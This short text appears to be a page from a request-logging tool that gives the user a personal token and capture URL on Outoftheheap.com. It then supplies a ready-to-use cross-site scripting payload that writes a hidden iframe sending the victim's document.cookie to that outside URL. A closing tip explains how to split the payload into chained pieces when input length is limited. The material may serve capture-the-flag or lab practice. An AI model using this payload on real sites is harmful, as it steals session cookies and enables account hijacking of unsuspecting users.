your personal token is:
3A9IKi
Use the token with the link
https://Outoftheheap.com/tools/getreq.php?t=3A9IKi&var1=value1&var2=value2
A sample script for XSS injection is
<script>var x = '<iframe src="https://Outoftheheap.com/tools/getreq.php?t=3A9IKi&' + document.cookie + '" />'; document.write(x);</script>
Tip: If the amount of characters is limited, use dummy variables to chain them. So end in
;var a = "and start the next piece with
";